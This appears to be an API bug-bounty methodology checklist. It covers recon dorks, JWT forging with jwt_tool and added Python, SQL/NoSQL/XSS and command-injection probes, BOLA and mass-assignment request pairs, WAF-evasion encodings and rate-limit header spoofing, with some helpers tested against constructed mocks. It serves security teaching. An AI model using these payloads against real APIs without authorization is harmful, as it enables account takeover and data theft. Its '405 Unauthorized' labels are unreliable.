- Arjun / Hunt by jhaddix
- Amass
- Kiterunner
- FFUF
- Param Miner
- crAPI
- Juice Shop
- VAmPI
- DVWS-node
- Damn Vulnerable MicroServices
- Node-API-goat
- Vulnerable GraphQL API
- Generic-University
- vulnapi
- JWT Knowledge
- IDOR
- Access Control Issues
- SQLi
- NoSQLi
- More to be added
- Subdomain Enumeration To API Discovery
cat subs.txt | grep "api"
- Wayback Data To API Discovery
# cut -d "/" -f 3 strips the scheme from httpx output so only the host is passed on
cat subs.txt | httpx | cut -d "/" -f 3 | waybackurls | anew urls.txt
cat subs.txt | httpx | cut -d "/" -f 3 | gau | anew urls.txt
cat subs.txt | httpx | hakrawler | anew urls.txt
# keep the responses that look like an API (JSON/XML content type, or "json" anywhere in the dump)
cat urls.txt | httpx -debug | grep -iE "content-type: application/(json|xml)|json"
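To triage the URL dump these pipelines produce, here is an added Python example (not part of the original notes or of any tool listed above): it keeps only URLs whose path looks like an API surface, dedupes them by parameter name so `?id=12` and `?id=13` collapse into one entry, and derives the older/newer version paths worth fuzzing. The sample URL list is constructed, and the `API_PATH_HINTS` pattern is an assumption to tune per target.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path fragments that usually mark an API surface (assumption: tune per target).
API_PATH_HINTS = re.compile(
    r"/api/|/rest/|/graphql|/wp-json/|/swagger|/openapi|/v\d+/|\.json(?:$|\?)|\.xml(?:$|\?)",
    re.IGNORECASE,
)
VERSION_RE = re.compile(r"/v(\d+)(?=/|$)", re.IGNORECASE)

# Constructed sample of what waybackurls/gau/hakrawler might emit; not from a real target.
SAMPLE_URLS = """
https://example.com/
https://example.com/api/v1/users?id=12
https://example.com/api/v1/users?id=13
https://api.example.com/v2/orders/99
https://example.com/wp-json/wp/v2/users
https://example.com/static/app.js
https://example.com/graphql
https://example.com/products.json?page=2
""".split()


def normalize(url):
    """Keep scheme, host, path and parameter *names* only, so
    /users?id=12 and /users?id=13 collapse into one entry."""
    parts = urlsplit(url)
    names = sorted({k for k, _ in parse_qsl(parts.query, keep_blank_values=True)})
    query = "&".join(f"{k}=" for k in names)
    return f"{parts.scheme}://{parts.netloc}{parts.path}" + (f"?{query}" if query else "")


def api_candidates(urls):
    """Deduplicated URLs that look like API endpoints, in first-seen order."""
    seen, out = set(), []
    for u in urls:
        if not API_PATH_HINTS.search(u):
            continue
        n = normalize(u)
        if n not in seen:
            seen.add(n)
            out.append(n)
    return out


def version_variants(url, up_to=3):
    """/api/v1/x -> /api/v0/x, /api/v2/x, /api/v3/x.  Older versions are often
    still routed and sometimes miss checks that were added later."""
    m = VERSION_RE.search(url)
    if not m:
        return []
    current = int(m.group(1))
    return [VERSION_RE.sub(f"/v{n}", url, count=1) for n in range(up_to + 1) if n != current]


if __name__ == "__main__":
    for candidate in api_candidates(SAMPLE_URLS):
        print(candidate, version_variants(candidate))
```

Feed it `urls.txt` instead of `SAMPLE_URLS` and pass the version variants to ffuf or kiterunner as extra targets.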
- Google Dorking
inurl:"/wp-json/wp/v2/users"
# Finds all publicly available WordPress API user directories
intitle:"index.of" intext:"api.txt"
# Finds publicly available API key files
inurl:"/includes/api/" intext:"index of /"
# Finds potentially interesting API directories
ext:php inurl:"api.php?action="
# Finds sites exposing the old XenAPI endpoint once affected by SQL injection (historical, mostly patched)
intitle:"index of" api_key OR "api key" OR apiKey -pool
# Lists potentially exposed API keys
- Shodan To API Discovery
hostname:"targetname.com" "content-type: application/json"
hostname:"targetname.com" "content-type: application/xml"
hostname:"targetname.com" "wp-json"
eg : "example.com" "content-type: application/json"
- Bruteforce Target To API Discovery
# Wordlist : API_superlist
ffuf -u https://FUZZ.example.com -w API_superlist.txt
# Wordlist /api/wordlists/common_apis_160
ffuf -u https://example.com/FUZZ -w common_apis_160
- Manual Github Recon
- Search For API Key, Endpoints , Datasets
- Check Commits , Pull Requests
- Recon about the API from Grep.App
- Recon about the API from GitRob
- Recon about the API from ProgrammableWeb
- Recon about the API from RapidAPI
- Recon about the API from APIs.guru
- Javascript Enumeration
- Scan for APIs running on other port numbers
- Shodan
- naabu
- Hidden API paths in the robots.txt file
- Check API URLs from urlscan.io
- Discovering API Content with Kiterunner
kr scan http://192.168.195.132:8090 -w ~/api/wordlists/data/kiterunner/routes-large.kite
# kr brute also accepts a plain .txt wordlist
kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt
- Try To Find API Documentation
- Create an account and check
- Check whether a subdomain such as docs.example.com exists
- Bruteforce
- If the documentation is private, check Wayback Machine and urlscan.io
- Javascript Endpoint Analysis
RedJs: A tool created by me. Under development but best so far.
# Save all JS files into one folder
redjs -u https://example.com -v -o scripts
redjs -t scripts | grep "Found"
- Standard Notation in docs
Convention: : or {}
Meaning: A colon or curly brackets mark a path variable. ":id" stands for the ID number and "{username}" for the account username you are trying to access.
Example: /user/:id, /user/{id}, /user/2727, /account/:username, /account/{username}, /account/scuttleph1sh
Convention: []
Meaning: Square brackets mark an optional input.
Example: /api/v1/user?find=[name]
Convention: ||
Meaning: Double bars separate the alternative values that can be used.
Example: "blue" || "green" || "red"
Convention: < >
Meaning: Angle brackets represent a DOMString (a UTF-16 string).
Example: <find-function>
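The notation above is easy to read but tedious to turn into requests by hand. The following is an added Python example (not from the original notes) that parses the `:id` / `{id}` / `[optional]` / `a || b` conventions: it builds a matcher for a documented route and expands a template plus candidate values into every concrete path a tester would send. The route strings are the ones from the table; the candidate values are constructed.

```python
import re
from itertools import product

VAR_RE = re.compile(r":([A-Za-z_]\w*)|\{([A-Za-z_]\w*)\}")  # :id or {id}
OPT_RE = re.compile(r"\[([A-Za-z_]\w*)\]")                   # [name]


def route_to_regex(template):
    """/user/:id or /user/{id} -> anchored regex with one named group per variable."""
    pattern, pos = "", 0
    for m in VAR_RE.finditer(template):
        name = m.group(1) or m.group(2)
        pattern += re.escape(template[pos:m.start()]) + f"(?P<{name}>[^/?#]+)"
        pos = m.end()
    return re.compile("^" + pattern + re.escape(template[pos:]) + "$")


def match_route(template, path):
    """Dict of captured variables, or None when the path does not fit the template."""
    m = route_to_regex(template).match(path)
    return m.groupdict() if m else None


def alternatives(spec):
    """'"blue" || "green" || "red"' -> ['blue', 'green', 'red']"""
    return [s.strip().strip('"\'\u201c\u201d') for s in spec.split("||")]


def _clean_query(path):
    """Drop parameters left empty by a removed [optional] input."""
    base, _, query = path.partition("?")
    kept = [kv for kv in query.split("&") if kv and not kv.endswith("=")]
    return base + ("?" + "&".join(kept) if kept else "")


def _as_list(value):
    return list(value) if isinstance(value, (list, tuple)) else [value]


def expand(template, values):
    """Every concrete path to send: each :var/{var} filled from values (a list
    gives one path per alternative), each [opt] once present and once absent."""
    names = [m.group(1) or m.group(2) for m in VAR_RE.finditer(template)]
    optionals = OPT_RE.findall(template)
    out = []
    for combo in product(*[_as_list(values[n]) for n in names]):
        fill = iter(combo)
        filled = VAR_RE.sub(lambda m: str(next(fill)), template)
        for present in product([True, False], repeat=len(optionals)):
            flags = iter(present)
            path = OPT_RE.sub(
                lambda m: str(values[m.group(1)]) if next(flags) and m.group(1) in values else "",
                filled)
            path = _clean_query(path)
            if path not in out:
                out.append(path)
    return out


if __name__ == "__main__":
    print(match_route("/account/{username}", "/account/scuttleph1sh"))
    print(expand("/api/v1/user?find=[name]", {"name": "scuttleph1sh"}))
    print(expand("/user/:id", {"id": [2727, 3333]}))
```

Giving `expand` a list of IDs (UserA's and UserB's) for `:id` is the quickest way to produce the request pairs used for the BOLA tests later in these notes.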
- What sorts of actions can I take?
- Can I interact with other user accounts?
- What kinds of resources are available?
- When I create a new resource, how is that resource identified?
- Can I upload a file? Can I edit a file?
- Try To Perform Privileged Actions
- Find Information Disclosures
- Unusual Header
- Unusual Parameter In Response
- Disclosed email, phone number, etc.: try IDOR
- Create 2 accounts try accessing user 1's detail with user 2's JWT.
- Finding Security Misconfigurations
- Verbose Errors: "Email not found" enables email enumeration, "Username incorrect" likewise; a disclosed software version enables a CVE search or a local setup to test against
- Debug Mode Enabled : Plenty of wordlists out there to test these
- Finding Excessive Data Exposures
- Brute Force Authentication
- Bruteforce passwords according to the target's password policy
- Bruteforce OTP / 2FA codes
- Bypass IP bans with load-balancer headers like X-Forwarded-For
- Bypass rate limiting by tampering with signature headers and rotating multiple generated tokens
- Combine all of the above if necessary
- Forging Tokens
- Create multiple accounts
- Save Access Token into a text file
- Analyze using Burp Sequencer > Manual Load > Analyze Now
- Also character-level analysis
- Burp live capture to analyze token predictability
- Use Intruder To Bruteforce
- Use Burp JWT Extensions
- Use jwt_tool
jwt_tool <jwt>
# paste the whole token (header.payload.signature) as the single argument; jwt_tool decodes it and lists the claims
- Attack JWT using jwt_tool
jwt_tool -t http://target-site.com/ -rh "Authorization: Bearer <JWT_Token>" -M pb
# -rh sends the token in a request header (-rc is for cookies), -M pb runs the playbook scan
- Check the jwt_tool attacks manual for:
- None algorithm attack
# Burp JWT extension, or:
jwt_tool <JWT_Token> -X a
- Algorithm confusion attack
# check the JWT attacks manual
- Find the company's public key used for RS256 (often published as a JWKS, e.g. at /.well-known/jwks.json)
- Convert it from JSON (JWK) to .pem if needed and save it
jwt_tool <JWT_Token> -X k -pk public-key.pem
# key confusion: the RS256 public key is reused as the HS256 HMAC secret
- Weak Signature Crack Attack
jwt_tool <JWT_Token> -C -d /wordlist.txt
# -C cracks the HMAC secret using the dictionary given with -d
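To see what jwt_tool's `-X a`, `-X k` and `-C` modes actually do on the wire, here is an added Python example (not from the original notes and not jwt_tool's code) that builds the three forgeries by hand with only the standard library: an `alg:none` token in the spellings some libraries fail to reject, an RS256-to-HS256 key-confusion token signed with the public-key bytes, and an offline dictionary crack of an HS256 secret. It also shows the verifier a correct server runs, which pins the algorithm instead of trusting the header. The secret, wordlist, public key bytes and demo token are all constructed.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode(token):
    """Split a compact JWT into (header, payload, signature) without verifying."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), s


def encode(header, payload, key=b""):
    """Serialize a JWT.  HS256 gets an HMAC signature; any other alg (e.g. none)
    is emitted with an empty signature, which is exactly the forged shape."""
    h = b64url(json.dumps(header, separators=(",", ":")).encode())
    p = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = ""
    if header.get("alg") == "HS256":
        sig = b64url(hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest())
    return f"{h}.{p}.{sig}"


def none_variants(token, **claims):
    """alg:none forge with the spellings some libraries fail to reject (jwt_tool -X a)."""
    header, payload, _ = decode(token)
    return [encode({**header, "alg": alg}, {**payload, **claims})
            for alg in ("none", "None", "NONE", "nOnE")]


def key_confusion(token, public_key_pem: bytes, **claims):
    """RS256 -> HS256 confusion (jwt_tool -X k -pk): if the verifier picks the
    algorithm from the header, the public key bytes become the HMAC secret."""
    header, payload, _ = decode(token)
    return encode({**header, "alg": "HS256"}, {**payload, **claims}, public_key_pem)


def crack_hs256(token, wordlist):
    """Offline dictionary attack on the HMAC secret (jwt_tool -C -d)."""
    h, p, sig = token.split(".")
    signing_input = f"{h}.{p}".encode()
    for word in wordlist:
        if b64url(hmac.new(word.encode(), signing_input, hashlib.sha256).digest()) == sig:
            return word
    return None


def verify_hs256(token, key):
    """What a correct server does: pin the algorithm, ignore the header's alg
    choice, and compare in constant time.  Returns the payload or None."""
    header, payload, sig = decode(token)
    if header.get("alg") != "HS256":
        return None
    h, p, _ = token.split(".")
    expected = b64url(hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest())
    return payload if hmac.compare_digest(expected, sig) else None


# Constructed demo material (not real keys or captured tokens).
SECRET = b"secret123"
WORDLIST = ["password", "changeme", "secret123", "jwtsecret"]
FAKE_PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nNOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"
DEMO_TOKEN = encode({"typ": "JWT", "alg": "HS256"},
                    {"sub": "1234567890", "name": "hAPI Hacker", "admin": False}, SECRET)

if __name__ == "__main__":
    print("cracked secret:", crack_hs256(DEMO_TOKEN, WORDLIST))
    forged = none_variants(DEMO_TOKEN, admin=True)[0]
    print("alg:none forge accepted by pinned verifier?", verify_hs256(forged, SECRET) is not None)
```

The key-confusion token only works against a verifier that hands whatever key it has to whatever algorithm the header names; `verify_hs256` with the PEM bytes as `key` models that mistake, while the same function with the real secret rejects it.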
- Input could include symbols, numbers, emojis, decimals, hexadecimal, system commands, SQL input and NoSQL input, for instance.
- SQL detection payloads, including time-based ones
- NoSQL detection payloads
- A value in the quadrillions
- String of letters instead of numbers
- A large decimal number or a negative number
- Null values like null, (null), %00, and 0x00
- Symbols like the following: !@#$%^&*();':''|,./?>
- Sending characters from unexpected languages (漢, さ, Ж, Ѫ, Ѭ, Ѧ, Ѩ, Ѯ)
# wordlists
# big-list-of-naughty-strings.txt : From SecLists
# https://github.com/fuzzdb-project/fuzzdb
# https://github.com/xmendez/wfuzz
- Quick Test
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
9999999999999999999999999999999999999999
~'!@#$%^&*()-_+
{}[]|\:''; '<>?,./
%00
0x00
$ne
%24ne
$gt
%24gt
|whoami
-- -
' ''
' OR 1=1-- -
'' ''''''
漢, さ, Ж, Ѫ, Ѭ, Ѧ, Ѩ, Ѯ
😀 😃 😄 😁
..
..\
../
\..\
\..\.\
- Testing IDORs And Access Controls (BOLA)
Type: Predictable ID
  Valid request: GET /api/v1/account/2222   Token: UserA_token
  BOLA test:     GET /api/v1/account/3333   Token: UserA_token
Type: ID combo
  Valid request: GET /api/v1/UserA/data/2222   Token: UserA_token
  BOLA test:     GET /api/v1/UserB/data/3333   Token: UserA_token
Type: Integer as ID
  Valid request: POST /api/v1/account/   Token: UserA_token   {"Account": 2222}
  BOLA test:     POST /api/v1/account/   Token: UserA_token   {"Account": [3333]}
Type: Email as user ID
  Valid request: POST /api/v1/user/account   Token: UserA_token   {"email": "[email protected]"}   (UserA's email)
  BOLA test:     POST /api/v1/user/account   Token: UserA_token   {"email": "[email protected]"}   (UserB's email)
Type: Group ID
  Valid request: GET /api/v1/group/CompanyA   Token: UserA_token
  BOLA test:     GET /api/v1/group/CompanyB   Token: UserA_token
Type: Group and user combo
  Valid request: POST /api/v1/group/CompanyA   Token: UserA_token   {"email": "[email protected]"}   (UserA's email)
  BOLA test:     POST /api/v1/group/CompanyB   Token: UserA_token   {"email": "[email protected]"}   (UserB's email)
Type: Nested object
  Valid request: POST /api/v1/user/checking   Token: UserA_token   {"Account": 2222}
  BOLA test:     POST /api/v1/user/checking   Token: UserA_token   {"Account": {"Account": 3333}}
Type: Multiple objects
  Valid request: POST /api/v1/user/checking   Token: UserA_token   {"Account": 2222}
  BOLA test:     POST /api/v1/user/checking   Token: UserA_token   {"Account": 2222, "Account": 3333, "Account": 5555}
Type: Predictable token
  Valid request: POST /api/v1/user/account   Token: UserA_token   {"data": "DflK1df7jSdfa1acaa"}
  BOLA test:     POST /api/v1/user/account   Token: UserA_token   {"data": "DflK1df7jSdfa2dfaa"}
- A-B Method
- Tools: Burp Autorize, Burp AutoRepeater
- List sensitive endpoints
- Create 2 accounts
- Save cookies/tokens and IDs
- Request every sensitive endpoint, swapping IDs and tokens between the two accounts as shown above
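The table and the A-B method above are mechanical enough to script. Here is an added Python example (not from the original notes, and not Autorize or AutoRepeater) that generates the table's request variants for one endpoint (swapped ID, array wrap, nested object, duplicate keys, UserB's token) and applies the A-B judgement: first record what each user legitimately receives, then flag any request that hands UserA's token the data UserB should see, or vice versa. The two users, the endpoint and the in-memory responder are constructed; `mock_api` is deliberately missing the object-level check and `fixed_api` adds it.

```python
import json

# Constructed test identities.
USER_A = {"token": "UserA_token", "id": 2222, "email": "usera@example.test", "group": "CompanyA"}
USER_B = {"token": "UserB_token", "id": 3333, "email": "userb@example.test", "group": "CompanyB"}


def _swap(path, a, b):
    return path.replace(str(a["id"]), str(b["id"])).replace(a["group"], b["group"])


def _raw(body):
    return json.dumps(body) if body is not None else None


def bola_variants(method, path, body, a=USER_A, b=USER_B):
    """Yield (label, method, path, raw_body, token): the table's rows for one request."""
    yield "baseline", method, path, _raw(body), a["token"]
    if _swap(path, a, b) != path:
        yield "predictable id / group", method, _swap(path, a, b), _raw(body), a["token"]
    if body and "Account" in body:
        yield "array wrap", method, path, _raw({**body, "Account": [b["id"]]}), a["token"]
        yield "nested object", method, path, _raw({**body, "Account": {"Account": b["id"]}}), a["token"]
        # A dict cannot hold a duplicate key, so the raw JSON is written by hand.
        # Which copy wins differs by parser (Python: last; some parsers: first).
        yield "duplicate keys", method, path, f'{{"Account": {a["id"]}, "Account": {b["id"]}}}', a["token"]
    if body and "email" in body:
        yield "email as id", method, path, _raw({**body, "email": b["email"]}), a["token"]
    yield "A-B token swap", method, path, _raw(body), b["token"]


def mock_api(method, path, raw_body, token):
    """Constructed VULNERABLE backend: authenticates the token, then serves
    whichever account the request names.  Object-level authorization is missing."""
    if token not in (USER_A["token"], USER_B["token"]):
        return 401, {}
    body = json.loads(raw_body) if raw_body else {}
    acct = body.get("Account")
    if isinstance(acct, list):
        acct = acct[0]
    if isinstance(acct, dict):
        acct = acct.get("Account")
    if acct is None and "email" in body:
        acct = {USER_A["email"]: USER_A["id"], USER_B["email"]: USER_B["id"]}.get(body["email"])
    if acct is None and path.rsplit("/", 1)[-1].isdigit():
        acct = int(path.rsplit("/", 1)[-1])
    return 200, {"account": acct, "owner": "UserA" if acct == USER_A["id"] else "UserB"}


def fixed_api(method, path, raw_body, token):
    """Same backend with the missing check: the resolved account must belong to the caller."""
    status, data = mock_api(method, path, raw_body, token)
    owner_id = {USER_A["token"]: USER_A["id"], USER_B["token"]: USER_B["id"]}.get(token)
    if status == 200 and data["account"] != owner_id:
        return 403, {}
    return status, data


def run_matrix(method, path, body, a=USER_A, b=USER_B, send=mock_api):
    """A-B method: learn what each user legitimately receives, then flag any
    request that returns the *other* user's data."""
    b_body = {**body, "Account": b["id"]} if body and "Account" in body else body
    _, a_data = send(method, path, _raw(body), a["token"])
    _, b_data = send(method, _swap(path, a, b), _raw(b_body), b["token"])
    results = {}
    for label, m, p, raw, tok in bola_variants(method, path, body, a, b):
        status, data = send(m, p, raw, tok)
        foreign = a_data if tok == b["token"] else b_data
        if label == "baseline":
            results[label] = "ok" if status == 200 else str(status)
        elif status == 200 and data == foreign:
            results[label] = "VULNERABLE"
        elif status in (401, 403, 404):
            results[label] = "blocked"
        else:
            results[label] = "review"
    return results


if __name__ == "__main__":
    print(run_matrix("POST", "/api/v1/account/", {"Account": 2222}))
    print(run_matrix("POST", "/api/v1/account/", {"Account": 2222}, send=fixed_api))
```

Replace `mock_api` with a function that sends the request through your proxy and returns `(status, parsed_json)`, and the same `run_matrix` drives a real target; comparing against UserB's legitimate response, rather than just looking for a 200, is what keeps the A-B method from flagging generic error pages.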
- Side-Channel BOLA
- Can be used to chain attacks: even when the data itself is protected, a different status code (or response time) for existing vs nonexistent IDs tells you which IDs are valid
Request                              Response
GET /api/user/test987123             404 Not Found HTTP/1.1
GET /api/user/hapihacker             405 Unauthorized HTTP/1.1
GET /api/user/1337                   405 Unauthorized HTTP/1.1
GET /api/user/phone/2018675309       405 Unauthorized HTTP/1.1
- BFLA involves searching for functionality to which you should not have access.
- Try each method: GET, POST, PUT, PATCH, DELETE
- A-B-A Testing for BFLA
- Create, read, update, or delete resources as UserA
- Swap out your UserA token for UserB's
- Send GET, PUT, POST, and DELETE requests for UserA's resources using UserB's token
- Check UserA's resources to validate whether changes were made using UserB's token
- Use the Burp Suite Match and Replace option
- Mass Assignment
- Add unknown JSON variables to each request. Account registration, profile editing, user management, and client management are all common functions that let clients submit input through the API.
- Use the Burp Param Miner extension -> Guess JSON data
- Arjun
- Documentation
- HUNT
- e.g.
# From this
POST /api/v1/register
--snip--
{
"username":"hAPI_hacker",
"email":"[email protected]",
"password":"Password1!"
}
# To this
POST /api/v1/register
--snip--
{
"username":"hAPI_hacker",
"email":"[email protected]",
"admin": true,
"password":"Password1!"
}
- When the API sends a forgot-password link to an email address, supply a phone number parameter instead to trigger an exception
- Change GroupA to GroupB to access GroupB's resources
- Take the JSON parameter names found by Arjun and use them (the duplicate keys below are intentional: some parsers keep the first copy, others the last)
POST /api/v1/register
--snip--
{
"username":"hAPI_hacker",
"email":"[email protected]",
"admin": true,
"admin":1,
"isadmin": true,
"role":"admin",
"role":"administrator",
"user_priv": "admin",
"password":"Password1!"
}
- Automating Mass Assignment Attacks with Arjun and Burp Suite Intruder
arjun --headers "Content-Type: application/json" -u http://vulnhost.com/api/register -m JSON --include='{$arjun$}'
- Found BFLA
- Chain BFLA with mass assignment to increase impact
- e.g.
# From
PUT /api/v1/account/update
Token:UserA-Token
--snip--
{
"username": "Ash",
"address": "123 C St",
"city": "Pallet Town",
"region": "Kanto"
}
# To
PUT /api/v1/account/update
Token:UserA-Token
--snip--
{
"username": "Brock",
"address": "456 Onyx Dr",
"city": "Pewter Town",
"region": "Kanto",
"email": "[email protected]",
"mfa": false
}
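The mass-assignment probes above (the single `admin: true` key, the Arjun list with duplicate keys, and the `mfa: false` chained into the account update) all follow one procedure: splice a candidate key into a known-good body, submit it, and compare the stored profile with a clean one. Here is an added Python example (not from the original notes, Arjun or Param Miner) that automates that comparison; the candidate keys come from the payload list above, while the base body and the two in-memory registration handlers (one binding every key, one allow-listing) are constructed.

```python
import json

# Candidate privilege fields from the payload list above; extend with Arjun / Param Miner output.
CANDIDATES = [("admin", True), ("admin", 1), ("isadmin", True), ("role", "admin"),
              ("role", "administrator"), ("user_priv", "admin"), ("mfa", False)]
# Constructed known-good registration body.
BASE_BODY = {"username": "hAPI_hacker", "email": "hapi@hacker.test", "password": "Password1!"}


def injected_bodies(base, candidates=CANDIDATES):
    """Yield (label, raw_json): one extra key per request, plus a duplicate-key
    probe.  Raw strings are used because a dict cannot carry the same key twice,
    and JSON parsers disagree on whether the first or the last copy wins."""
    for key, value in candidates:
        yield f"{key}={value!r}", json.dumps({**base, key: value})
    yield "dup role", json.dumps(base)[:-1] + ', "role": "user", "role": "admin"}'


def mock_register(raw):
    """Constructed VULNERABLE handler: binds every JSON key onto the user record."""
    user = {"role": "user", "admin": False, "mfa": True}
    user.update(json.loads(raw))
    user.pop("password", None)
    return user


def safe_register(raw):
    """Hardened handler: only allow-listed fields are bound; the rest are dropped."""
    allowed = {"username", "email", "password"}
    user = {"role": "user", "admin": False, "mfa": True}
    user.update({k: v for k, v in json.loads(raw).items() if k in allowed})
    user.pop("password", None)
    return user


def persisted(base, register=mock_register, candidates=CANDIDATES):
    """Register once cleanly, then once per injected body; report every field
    whose stored value differs from the clean profile."""
    baseline = register(json.dumps(base))
    hits = []
    for label, raw in injected_bodies(base, candidates):
        profile = register(raw)
        diff = {k: v for k, v in profile.items() if baseline.get(k) != v}
        if diff:
            hits.append((label, diff))
    return hits


if __name__ == "__main__":
    print("vulnerable:", persisted(BASE_BODY))
    print("hardened:  ", persisted(BASE_BODY, safe_register))
```

Against a real API, `register` becomes "POST the body, then GET the profile"; the diff against the clean profile is what tells you whether a key was silently bound, which a 200 on the registration call alone does not.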
- Before you can inject a payload using an API, you must discover places where the API accepts user input
- API keys
- Tokens
- Headers
- Query strings in the URL
- Parameters in POST/PUT requests
- Injection Payloads
- Data that is displayed in a web page: try XSS in username / email / address / anything you control
<script>alert("xss")</script>
<script>alert(1);</script>
<%00script>alert(1)</%00script>
SCRIPT>alert("XSS");///SCRIPT>
- Any request that creates or changes data: test for stored (persistent) injection
- SQL Injection
# Detection Payload
'
''
;%00
--
-- -
""
;
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
OR 1=1
- NoSql Injection
# Detection
$gt
{"$gt":""}
{"$gt":-1}
$ne
{"$ne":""}
{"$ne":-1}
$nin
{"$nin":1}
{"$nin":[1]}
|| '1'=='1
//
||'a'\\'a
'||'1'=='1';//
'/{}:
'"\;{}
'"\/$[].>
{"$where": "sleep(1000)"}
- Command Injection  # wordlists/os-cmds.txt
- Evading Security & WAF
- Detect WAF
wafw00f https://api.target.com
- Evasion payloads to bypass WAF: try all of these to determine which bypass method the backend accepts
- Parameter Pollution
- URL Encoding
- Base64 & HTML encoding
- String Terminators
# add as prefix or suffix
%00
0x00
//
;
%
!
?
[]
%5B%5D
%09
%0a
%0b
%0c
%0e
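Trying "all of these" by hand is slow, and the interesting result is not which variant the WAF blocks but which one the backend still interprets. The following is an added Python example (not from the original notes) that generates the terminator, encoding and parameter-pollution variants of one payload and runs them through a constructed edge: a naive WAF signature that inspects the raw value without decoding it, in front of a backend that URL-decodes once. The payload is the `' OR 1=1-- -` probe from the detection list; the terminator list is the one above; both regexes are constructed stand-ins, so the set of variants that gets through will differ on a real target.

```python
import base64
import html
import re
from urllib.parse import quote, unquote

# String terminators from the list above, tried as prefix and suffix.
TERMINATORS = ["%00", "0x00", "//", ";", "%", "!", "?", "[]", "%5B%5D",
               "%09", "%0a", "%0b", "%0c", "%0e"]
PAYLOAD = "' OR 1=1-- -"  # SQLi probe from the detection payload list


def terminator_variants(payload):
    out = []
    for t in TERMINATORS:
        out.append((f"prefix {t}", t + payload))
        out.append((f"suffix {t}", payload + t))
    return out


def encoding_variants(payload):
    once = quote(payload, safe="")
    return [
        ("url", once),
        ("double-url", quote(once, safe="")),
        ("html", html.escape(payload, quote=True)),
        ("html-numeric", "".join(f"&#{ord(c)};" for c in payload)),
        ("base64", base64.b64encode(payload.encode()).decode()),
        ("case-swap", payload.swapcase()),
        ("unicode-escape", "".join(f"\\u{ord(c):04x}" for c in payload)),
    ]


def pollution_variants(param, payload, benign="1"):
    """HTTP parameter pollution: the WAF may inspect one copy of the parameter
    while the backend reads the other (first-wins vs last-wins differs by stack)."""
    enc = quote(payload, safe="")
    return [
        ("hpp benign-first", f"{param}={benign}&{param}={enc}"),
        ("hpp payload-first", f"{param}={enc}&{param}={benign}"),
        ("hpp array", f"{param}[]={enc}"),
    ]


def all_variants(param, payload):
    return terminator_variants(payload) + encoding_variants(payload) + pollution_variants(param, payload)


# Constructed naive edge: the WAF signature runs over the raw value (no decoding),
# while the backend URL-decodes once before the value reaches its query builder.
WAF_SIG = re.compile(r"'\s*or\s+\d+=\d+", re.IGNORECASE)
SQL_SINK = re.compile(r"'\s*or\s+1=1", re.IGNORECASE)


def mock_edge(value):
    """403 if the WAF blocks, 500 if the payload reached the SQL layer, else 200."""
    if WAF_SIG.search(value):
        return 403
    return 500 if SQL_SINK.search(unquote(value)) else 200


def accepted(param, payload, send=mock_edge):
    """Labels of the variants that both slipped past the WAF and were interpreted."""
    return [label for label, v in all_variants(param, payload) if send(v) == 500]


if __name__ == "__main__":
    print(accepted("id", PAYLOAD))
```

Swap `mock_edge` for a function that sends the value to the target and returns the status (or a timing), and the `accepted` list becomes your per-target record of which encoding the backend decodes that the WAF does not.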
- Rate Limit Bypass
- Configure IP Rotate (Burp extension)
- Use proxychains
- Check for these headers in request & response
x-rate-limit:
x-rate-limit-remaining:
- Path Bypass
POST /api/myprofile
--snip--
{uid=§0001§}
POST /api/myprofile%00
POST /api/myprofile%20
POST /api/myProfile
POST /api/MyProfile
POST /api/my-profile
- Origin Header Spoofing
X-Forwarded-For
X-Forwarded-Host
X-Host
X-Originating-IP
X-Remote-IP
X-Client-IP
X-Remote-Addr
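The path variants and the origin headers above are both ways of landing in a fresh rate-limit bucket; the x-rate-limit headers tell you whether it worked. Here is an added Python example (not from the original notes) that generates the path and header variants, reads the counters from response headers, and runs them against a constructed limiter that has the two classic bugs (bucketing on the raw path string and trusting X-Forwarded-For), beside a hardened version that normalises the path and ignores client-supplied address headers. The route, IPs and limiter are constructed; `path_variants` derives the case/suffix forms generically rather than hard-coding the `myProfile` / `my-profile` spellings shown above.

```python
from urllib.parse import unquote

# Headers the notes list for origin spoofing.
SPOOF_HEADERS = ["X-Forwarded-For", "X-Forwarded-Host", "X-Host", "X-Originating-IP",
                 "X-Remote-IP", "X-Client-IP", "X-Remote-Addr"]


def path_variants(path):
    """Same route, different string: %00 / %20 suffixes, trailing slash or ?, case changes."""
    head, _, last = path.rpartition("/")
    return [path, path + "%00", path + "%20", path + "/", path + "?",
            f"{head}/{last.capitalize()}", f"{head}/{last.upper()}"]


def header_spoof_variants(ips):
    """One (headers, label) per spoof header x IP, to find which header the limiter keys on."""
    return [({h: ip}, f"{h}={ip}") for h in SPOOF_HEADERS for ip in ips]


def rate_limit_state(headers):
    """(limit, remaining) from the x-rate-limit headers the notes say to watch; None if absent."""
    h = {k.lower(): v for k, v in headers.items()}
    lim = h.get("x-rate-limit") or h.get("x-ratelimit-limit")
    rem = h.get("x-rate-limit-remaining") or h.get("x-ratelimit-remaining")
    return (int(lim) if lim is not None else None, int(rem) if rem is not None else None)


class MockLimiter:
    """Constructed limiter with two common bugs: it buckets on the raw path string
    and it trusts X-Forwarded-For as the client address."""

    def __init__(self, limit=5):
        self.limit, self.counts = limit, {}

    def request(self, path, headers=None, client_ip="10.0.0.1"):
        headers = headers or {}
        key = (headers.get("X-Forwarded-For", client_ip), path)
        n = self.counts[key] = self.counts.get(key, 0) + 1
        status = 429 if n > self.limit else 200
        return status, {"x-rate-limit": str(self.limit),
                        "x-rate-limit-remaining": str(max(self.limit - n, 0))}


class FixedLimiter(MockLimiter):
    """Same limiter, hardened: normalise the path before bucketing and ignore
    client-supplied address headers (only a trusted proxy should set them)."""

    def request(self, path, headers=None, client_ip="10.0.0.1"):
        norm = unquote(path).rstrip("/? \x00").lower()
        return super().request(norm, {}, client_ip)


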